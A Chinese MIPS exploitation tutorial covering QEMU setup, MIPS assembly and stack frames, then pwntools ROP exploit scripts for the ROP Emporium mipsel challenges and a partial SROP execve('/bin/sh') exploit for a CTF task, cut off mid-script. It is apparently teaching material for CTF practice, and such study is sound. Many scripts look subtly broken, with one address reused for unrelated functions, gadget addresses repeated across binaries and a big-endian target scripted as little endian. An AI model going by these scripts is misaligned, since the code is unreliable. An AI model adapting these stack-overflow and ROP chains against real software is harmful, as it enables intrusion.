MIPS Pwn 快速上手实践指南<\/h1>

环境搭建<\/h2>

QEMU 环境配置<\/h3>
# 安装 QEMU 相关工具<\/span>
<\/span><\/span>sudo apt install qemu-system qemu-system-mips qemu-user-static qemu-utils qemu-web-desktop
<\/span><\/span>
<\/span><\/span># 安装调试工具<\/span>
<\/span><\/span>sudo apt install gdb gdb-multiarch
<\/span><\/span>
<\/span><\/span># 安装 pwndbg<\/span>
<\/span><\/span>git clone https:\/\/github.com\/pwndbg\/pwndbg
<\/span><\/span>cd pwndbg
<\/span><\/span>.\/setup.sh
<\/span><\/span>
<\/span><\/span># 安装交叉编译工具链<\/span>
<\/span><\/span>sudo apt install gcc-mips-linux-gnu gcc-mipsel-linux-gnu
<\/span><\/span>sudo apt install gcc-mips64-linux-gnuabi64 gcc-mips64el-linux-gnuabi64
<\/span><\/span>
<\/span><\/span># 安装 Python 环境<\/span>
<\/span><\/span>sudo apt install python3 python3-pip
<\/span><\/span><\/code><\/pre>系统模式模拟<\/h3>
下载镜像文件：<\/p>

大端序：https:\/\/people.debian.org\/~aurel32\/qemu\/mips\/<\/li>
小端序：https:\/\/people.debian.org\/~aurel32\/qemu\/mipsel\/<\/li>
<\/ul>
下载 debian_wheezy_mips_standard.qcow2<\/code> 镜像文件和 vmlinux-3.2.0-4-4kc-malta<\/code> 内核文件<\/p>
网络配置<\/h3>
# 创建网桥<\/span>
<\/span><\/span>sudo ip link add name virbr0 type bridge
<\/span><\/span>sudo ip addr add 192.168.6.1\/24 dev virbr0
<\/span><\/span>sudo ip link set dev virbr0 up
<\/span><\/span>
<\/span><\/span># 创建 TAP 接口<\/span>
<\/span><\/span>sudo ip tuntap add dev tap0 mode tap
<\/span><\/span>sudo ip link set dev tap0 up
<\/span><\/span>sudo ip link set dev tap0 master virbr0
<\/span><\/span><\/code><\/pre>启动 QEMU 系统模式<\/h3>
sudo qemu-system-mips \
<\/span><\/span><\/span><\/span>    -M malta \
<\/span><\/span><\/span><\/span>    -kernel vmlinux-3.2.0-4-4kc-malta \
<\/span><\/span><\/span><\/span>    -hda debian_wheezy_mips_standard.qcow2 \
<\/span><\/span><\/span><\/span>    -append "root=\/dev\/sda1 console=tty0"<\/span> \
<\/span><\/span><\/span><\/span>    -netdev tap,id=<\/span>tapnet,ifname=<\/span>tap0,script=<\/span>no \
<\/span><\/span><\/span><\/span>    -device rtl8139,netdev=<\/span>tapnet \
<\/span><\/span><\/span><\/span>    -nographic
<\/span><\/span><\/code><\/pre>默认用户名密码：root:root<\/p>
MIPS 架构简介<\/h2>
MIPS (Microprocessor without Interlocked Pipeline Stages) 是一种精简指令集计算机(RISC)架构，主要特点：<\/p>

精简指令集：指令数量相对较少，每条指令功能单一<\/li>
固定指令长度：所有指令都是32位(4字节)长度<\/li>
流水线设计：支持高效的指令流水线执行<\/li>
寄存器丰富：拥有32个通用寄存器<\/li>
加载\/存储架构：只有load\/store指令能访问内存<\/li>
延迟槽：分支和跳转指令后有一个延迟槽<\/li>
<\/ol>
字节序<\/h3>
MIPS程序有两种字节序：<\/p>
大端序 (Big Endian)<\/strong><\/p>

最高有效字节存储在最低地址<\/li>
人类阅读习惯一致<\/li>
<\/ul>
小端序 (Little Endian)<\/strong><\/p>

最低有效字节存储在最低地址<\/li>
Intel x86架构采用<\/li>
<\/ul>
示例：32位整数 0x12345678<\/code> 存储在地址 0x1000<\/code><\/p>



地址<\/th>
大端序(MIPS BE)<\/th>
小端序(MIPSEL)<\/th>
<\/tr>
<\/thead>


0x1000<\/td>
0x12<\/td>
0x78<\/td>
<\/tr>

0x1001<\/td>
0x34<\/td>
0x56<\/td>
<\/tr>

0x1002<\/td>
0x56<\/td>
0x34<\/td>
<\/tr>

0x1003<\/td>
0x78<\/td>
0x12<\/td>
<\/tr>
<\/tbody>
<\/table>
MIPS 汇编速成<\/h2>
通用寄存器 (GPRs)<\/h3>
MIPS32 拥有32个32位的通用寄存器，编号从0到31：<\/p>



寄存器编号<\/th>
汇编助记名<\/th>
约定用途<\/th>
是否由被调用者保存<\/th>
<\/tr>
<\/thead>


$0<\/td>
$zero<\/td>
硬编码为常量 0<\/td>
不适用<\/td>
<\/tr>

$1<\/td>
$at<\/td>
汇编器临时寄存器<\/td>
否<\/td>
<\/tr>

\(2-\)<\/span>3<\/td>
\(v0-\)<\/span>v1<\/td>
函数返回值和表达式求值<\/td>
否<\/td>
<\/tr>

\(4-\)<\/span>7<\/td>
\(a0-\)<\/span>a3<\/td>
函数参数<\/td>
否<\/td>
<\/tr>

\(8-\)<\/span>15<\/td>
\(t0-\)<\/span>t7<\/td>
临时寄存器<\/td>
否<\/td>
<\/tr>

\(16-\)<\/span>23<\/td>
\(s0-\)<\/span>s7<\/td>
保存寄存器<\/td>
是<\/td>
<\/tr>

\(24-\)<\/span>25<\/td>
\(t8-\)<\/span>t9<\/td>
临时寄存器<\/td>
否<\/td>
<\/tr>

\(26-\)<\/span>27<\/td>
\(k0-\)<\/span>k1<\/td>
保留给操作系统内核<\/td>
不适用<\/td>
<\/tr>

$28<\/td>
$gp<\/td>
全局指针<\/td>
是(通常)<\/td>
<\/tr>

$29<\/td>
$sp<\/td>
栈指针<\/td>
是<\/td>
<\/tr>

$30<\/td>
$fp<\/td>
帧指针<\/td>
是<\/td>
<\/tr>

$31<\/td>
$ra<\/td>
返回地址<\/td>
否<\/td>
<\/tr>
<\/tbody>
<\/table>
数据传输指令<\/h3>
lw (Load Word) - 加载字<\/strong><\/p>
lw<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 从内存加载32位数据到寄存器
<\/span><\/span><\/span><\/code><\/pre>sw (Store Word) - 存储字<\/strong><\/p>
sw<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 将寄存器中32位数据存储到内存
<\/span><\/span><\/span><\/code><\/pre>lb\/lh (Load Byte\/Halfword)<\/strong><\/p>
lb<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 加载字节，带符号扩展
<\/span><\/span><\/span><\/span>lh<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 加载半字，带符号扩展
<\/span><\/span><\/span><\/code><\/pre>sb\/sh (Store Byte\/Halfword)<\/strong><\/p>
sb<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 存储字节
<\/span><\/span><\/span><\/span>sh<\/span> $rt<\/span>, offset<\/span>($rs<\/span>)  # 存储半字
<\/span><\/span><\/span><\/code><\/pre>算术运算指令<\/h3>
add\/addi - 加法<\/strong><\/p>
add<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>    # 寄存器间加法
<\/span><\/span><\/span><\/span>addi<\/span> $rt<\/span>, $rs<\/span>, imm<\/span>   # 立即数加法
<\/span><\/span><\/span><\/code><\/pre>sub - 减法<\/strong><\/p>
sub<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>    # rd = rs - rt
<\/span><\/span><\/span><\/code><\/pre>mul - 乘法<\/strong><\/p>
mul<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>    # 简单乘法，32位结果
<\/span><\/span><\/span><\/span>mult<\/span> $rs<\/span>, $rt<\/span>        # 完整乘法，64位结果存入HI\/LO
<\/span><\/span><\/span><\/code><\/pre>div - 除法<\/strong><\/p>
div<\/span> $rs<\/span>, $rt<\/span>         # rs ÷ rt → 商存入LO，余数存入HI
<\/span><\/span><\/span><\/code><\/pre>逻辑运算指令<\/h3>
and\/andi - 与运算<\/strong><\/p>
and<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>    # 寄存器间与运算
<\/span><\/span><\/span><\/span>andi<\/span> $rt<\/span>, $rs<\/span>, imm<\/span>   # 与立即数运算
<\/span><\/span><\/span><\/code><\/pre>or\/ori - 或运算<\/strong><\/p>
or<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>     # 寄存器间或运算
<\/span><\/span><\/span><\/span>ori<\/span> $rt<\/span>, $rs<\/span>, imm<\/span>    # 与立即数或运算
<\/span><\/span><\/span><\/code><\/pre>xor\/xori - 异或运算<\/strong><\/p>
xor<\/span> $rd<\/span>, $rs<\/span>, $rt<\/span>    # 寄存器间异或
<\/span><\/span><\/span><\/span>xori<\/span> $rt<\/span>, $rs<\/span>, imm<\/span>   # 与立即数异或
<\/span><\/span><\/span><\/code><\/pre>分支跳转指令<\/h3>
beq - 相等则跳转<\/strong><\/p>
beq<\/span> $rs<\/span>, $rt<\/span>, label<\/span>  # 如果 rs == rt 则跳转到label
<\/span><\/span><\/span><\/code><\/pre>bne - 不等则跳转<\/strong><\/p>
bne<\/span> $rs<\/span>, $rt<\/span>, label<\/span>  # 如果 rs != rt 则跳转到label
<\/span><\/span><\/span><\/code><\/pre>j - 无条件跳转<\/strong><\/p>
j<\/span> label<\/span>              # 无条件跳转到label
<\/span><\/span><\/span><\/code><\/pre>jal - 跳转并链接<\/strong><\/p>
jal<\/span> label<\/span>            # 跳转到label，同时将返回地址保存到ra
<\/span><\/span><\/span><\/code><\/pre>jr - 寄存器跳转<\/strong><\/p>
jr<\/span> $rs<\/span>               # 跳转到rs寄存器中存储的地址
<\/span><\/span><\/span><\/code><\/pre>MIPS 栈的工作模式与栈帧<\/h2>
栈帧 (Stack Frame)<\/h3>
每次函数调用时，会在栈上为其创建一个区域，称为该函数的栈帧。栈帧包含与该函数调用相关的信息。<\/p>
一个典型的栈帧可能包含（从高地址到低地址）：<\/p>

传递给当前函数的参数（如果参数数量超过 \(a0-\)<\/span>a3）<\/li>
返回地址 ($ra)<\/li>
旧的帧指针 ($fp)<\/li>
被调用者保存的寄存器 (\(s0-\)<\/span>s7)<\/li>
局部变量<\/li>
临时空间<\/li>
<\/ol>
函数调用中的栈操作<\/h3>
函数序言 (Prologue):<\/strong><\/p>

调整 $sp 为当前函数栈帧分配空间<\/li>
保存 \(ra 和旧的 \)<\/span>fp 到栈上<\/li>
设置新的 $fp<\/li>
保存需要使用的 $s 寄存器到栈上<\/li>
<\/ol>
函数尾声 (Epilogue):<\/strong><\/p>

将返回值放入 \(v0 (和 \)<\/span>v1)<\/li>
从栈上恢复保存的 $s 寄存器<\/li>
恢复旧的 \(fp 和 \)<\/span>ra<\/li>
调整 $sp 释放当前函数栈帧<\/li>
使用 jr $ra 返回到调用者<\/li>
<\/ol>
MIPS ROP 基础<\/h2>
关于覆盖返回地址<\/h3>
在进入函数的时候，在栈帧初始化的时候保存到栈里：<\/p>
addiu<\/span>   $sp<\/span>, -0x20<\/span>
<\/span><\/span>sw<\/span>      $ra<\/span>, 0x20<\/span>+<\/span>var_4<\/span>($sp<\/span>)
<\/span><\/span>sw<\/span>      $fp<\/span>, 0x20<\/span>+<\/span>var_8<\/span>($sp<\/span>)
<\/span><\/span><\/code><\/pre>在退出函数的时候，从栈上取回返回地址，进行跳转：<\/p>
lw<\/span>      $ra<\/span>, 0x20<\/span>+<\/span>var_4<\/span>($sp<\/span>)
<\/span><\/span>lw<\/span>      $fp<\/span>, 0x20<\/span>+<\/span>var_8<\/span>($sp<\/span>)
<\/span><\/span>addiu<\/span>   $sp<\/span>, 0x20<\/span>
<\/span><\/span>jr<\/span>      $ra<\/span>
<\/span><\/span><\/code><\/pre>当发生栈溢出的时候，会覆盖到栈上的返回地址数据。<\/p>
gadget 查询工具<\/h3>
主要用 IDA 插件 mipsrop<\/code> 来查询：

https:\/\/github.com\/fuzzywalls\/ida\/tree\/master\/plugins\/mipsrop<\/p>
搜索示例：<\/p>

搜索寄存器控制 gadgets<\/li>
搜索跳转 gadgets<\/li>
<\/ul>
MIPS ROP Emporium 练习<\/h2>
0x01 ret2win_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
main函数：<\/p>
int<\/span> main<\/span>() {
<\/span><\/span>    pwnme();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>ret2win函数提供flag：<\/p>
void<\/span> ret2win<\/span>() {
<\/span><\/span>    puts("ROPE{a_placeholder_32byte_flag!}"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>溢出点到返回地址的距离：32+4=0x24，直接覆盖返回地址为ret2win即可<\/p>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400924<\/span>)  # ret2win地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/ret2win_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x02 split_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
main函数：<\/p>
int<\/span> main<\/span>() {
<\/span><\/span>    pwnme();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>溢出点到返回地址的距离依然是0x24<\/p>
利用思路：<\/p>

通过栈溢出控制返回地址到 0x00400A20<\/code> (gadget)<\/li>
通过栈读取参数，控制a0的值和t9的值<\/li>
执行system函数<\/li>
<\/ol>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400A20<\/span>)  # gadget地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00410B0C<\/span>)  # "cat flag.txt"字符串地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # system函数地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/split_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x03 callme_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
main函数：<\/p>
int<\/span> main<\/span>() {
<\/span><\/span>    pwnme();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>需要按顺序调用callme1、callme2、callme3三个函数才能正确给出flag<\/p>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B3C<\/span>)  # gadget地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x1<\/span>) +<\/span> p32(0x2<\/span>) +<\/span> p32(0x3<\/span>)  # 参数<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # callme1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B3C<\/span>)  # gadget地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x1<\/span>) +<\/span> p32(0x2<\/span>) +<\/span> p32(0x3<\/span>)  # 参数<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400A24<\/span>)  # callme2地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B3C<\/span>)  # gadget地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x1<\/span>) +<\/span> p32(0x2<\/span>) +<\/span> p32(0x3<\/span>)  # 参数<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400A60<\/span>)  # callme3地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/callme_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x04 write4_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
需要调用print_file函数用flag.txt的参数<\/p>
利用思路：<\/p>

通过gadget设置flag.txt到内存可写地方<\/li>
然后通过gadget完成print_file的调用<\/li>
<\/ol>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span># 写入flag.txt到内存<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # 可写地址<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'flag'<\/span>          # 字符串第一部分<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411004<\/span>)  # 可写地址+4<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'.txt'<\/span>          # 字符串第二部分<\/span>
<\/span><\/span># 调用print_file<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B34<\/span>)  # gadget2地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # flag.txt字符串地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # print_file地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/write4_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x05 badchars_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
输入里如果有xga.四个字符，就会被替换成0xeb<\/p>
利用思路：<\/p>

找个可写地址保存字符串<\/li>
通过gadget写入flag.txt，分两次写<\/li>
对可写地址的值进行异或操作，让0xeb变回原本的值<\/li>
跳转到print_file调用<\/li>
<\/ol>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span># 写入flag.txt到内存<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # 可写地址<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'fla'<\/span>           # 字符串第一部分<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411003<\/span>)  # 可写地址+3<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'g.t'<\/span>           # 字符串第二部分<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411006<\/span>)  # 可写地址+6<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'xt'<\/span>            # 字符串第三部分<\/span>
<\/span><\/span># 异或操作恢复被替换的字符<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B28<\/span>)  # gadget2地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0xeb<\/span> ^<\/span> 0x67<\/span>) # 异或值<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411003<\/span>)  # 需要异或的地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B28<\/span>)  # gadget2地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0xeb<\/span> ^<\/span> 0x2e<\/span>) # 异或值<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411005<\/span>)  # 需要异或的地址<\/span>
<\/span><\/span># 调用print_file<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B34<\/span>)  # gadget3地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # flag.txt字符串地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # print_file地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/badchars_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x06 fluff_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
利用思路：<\/p>

将字符串的值写入s1寄存器，可写地址的值保存到s0中<\/li>
将字符串的地址写入a0，跳转print_file<\/li>
<\/ol>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span># 设置s0=0<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B04<\/span>)  # gadget1地址<\/span>
<\/span><\/span># 设置s2=0x00411000 (可写地址)<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget2地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # 可写地址<\/span>
<\/span><\/span># 异或s1=s1^s2 (s1=0^0x00411000=0x00411000)<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B1C<\/span>)  # gadget3地址<\/span>
<\/span><\/span># s0和s1交换 (s0=0x00411000, s1=0)<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B28<\/span>)  # gadget4地址<\/span>
<\/span><\/span># 设置s2='flag'<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B10<\/span>)  # gadget2地址<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>'flag'<\/span>          # 字符串第一部分<\/span>
<\/span><\/span># 异或s1=s1^s2 (s1=0^'flag'='flag')<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B1C<\/span>)  # gadget3地址<\/span>
<\/span><\/span># 保存s1到s0指向的地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B34<\/span>)  # gadget5地址<\/span>
<\/span><\/span># 重复上述过程写入'.txt'<\/span>
<\/span><\/span># ... (省略类似代码)<\/span>
<\/span><\/span># 调用print_file<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B40<\/span>)  # gadget6地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # flag.txt字符串地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # print_file地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/fluff_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x07 pivot_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
利用思路：<\/p>

gadget4完成迁移<\/li>
调用foothold_function让got表中解析出其在so的地址<\/li>
计算foothold_function和ret2win的偏移<\/li>
计算ret2win的地址<\/li>
执行ret2win<\/li>
<\/ol>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 第一次输入 - 栈迁移后的ROP链<\/span>
<\/span><\/span>rop_chain =<\/span> p32(0x00400B10<\/span>)  # gadget1地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x004009E8<\/span>)  # foothold_function地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00400B28<\/span>)  # gadget2地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00411000<\/span>)  # foothold_function的got地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00400B34<\/span>)  # gadget3地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00411000<\/span>)  # foothold_function的实际地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00400B40<\/span>)  # gadget4地址<\/span>
<\/span><\/span># 计算ret2win地址 = foothold_function地址 + 偏移<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00400B4C<\/span>)  # gadget5地址<\/span>
<\/span><\/span>rop_chain +=<\/span> p32(0x00400B58<\/span>)  # ret2win地址<\/span>
<\/span><\/span>
<\/span><\/span># 第二次输入 - 栈迁移<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00400B04<\/span>)  # gadget4地址 (栈迁移)<\/span>
<\/span><\/span>payload +=<\/span> p32(0x00411000<\/span>)  # 新的栈地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/pivot_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(rop_chain)
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>0x08 ret2csu_mipsel<\/h3>
题目分析&利用分析<\/strong><\/p>
利用思路：

通过csu的片段完成参数控制和ret2win的调用<\/p>
exp 核心代码<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009C0<\/span>)  # csu_init地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x1<\/span>) +<\/span> p32(0x2<\/span>) +<\/span> p32(0x3<\/span>)  # 参数<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009A0<\/span>)  # csu_gadget地址<\/span>
<\/span><\/span>payload +=<\/span> p32(0x004009E8<\/span>)  # ret2win地址<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(['qemu-mipsel'<\/span>, '-L'<\/span>, '\/usr\/mipsel-linux-gnu'<\/span>, '.\/ret2csu_mipsel'<\/span>])
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>ROP进阶技巧：SROP，比赛真题分析<\/h2>
题目来源：The Cyber Jawara International 2024 - mipsssh<\/p>
题目情况<\/strong><\/p>

静态链接的mips32 msb程序<\/li>
没有PIE<\/li>
存在栈溢出漏洞<\/li>
<\/ul>
利用分析<\/strong>

利用思路：<\/p>

通过srop进行栈迁移，设置sp到.bss段上，然后设置pc到main函数重新开始执行<\/li>
通过srop进行syscall调用execve<\/li>
<\/ol>
完整exp<\/strong><\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'mips'<\/span>
<\/span><\/span>context.<\/span>endian =<\/span> 'little'<\/span>
<\/span><\/span>
<\/span><\/span># 构造SROP frame<\/span>
<\/span><\/span>frame =<\/span> SigreturnFrame()
<\/span><\/span>frame.<\/span>ra =<\/span> 0x00400000<\/span>  # main函数地址<\/span>
<\/span><\/span>frame.<\/span>sp =<\/span> 0x00411000<\/span>  # 新的栈地址<\/span>
<\/span><\/span>frame.<\/span>pc =<\/span> 0x004005A0<\/span>  # syscall指令地址<\/span>
<\/span><\/span>
<\/span><\/span># 第一次输入 - 栈迁移<\/span>
<\/span><\/span>payload1 =<\/span> b<\/span>'A'<\/span> *<\/span> 0x24<\/span>
<\/span><\/span>payload1 +=<\/span> p32(0x004005A0<\/span>)  # syscall指令地址<\/span>
<\/span><\/span>payload1 +=<\/span> bytes(frame)
<\/span><\/span>
<\/span><\/span># 第二次输入 - execve("\/bin\/sh", 0, 0)<\/span>
<\/span><\/span>frame2 =<\/span> SigreturnFrame()
<\/span><\/span>frame2.<\/span>a0 =<\/span> 0x00411000<\/span>  # "\/bin\/sh"字符串地址<\/span>
<\/span><\/span>frame2.<\/span>a1 =<\/span> 0<\/span>
<\/span><\/span>frame2.<\/span>a2 =<\/span> 0<\/span>
<\/span><\/span>frame2.<\/span>v0 =<\/span> 4011<\/span>        # execve系统调用号<\/span>
<\/span><\/span>frame2.<\/span>pc =<\/span> 0x004005A0<\/span>  # syscall指令地址<\/span>
<\/span><\/span>
<\/span><\/span>payload2 =<\/span> b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>
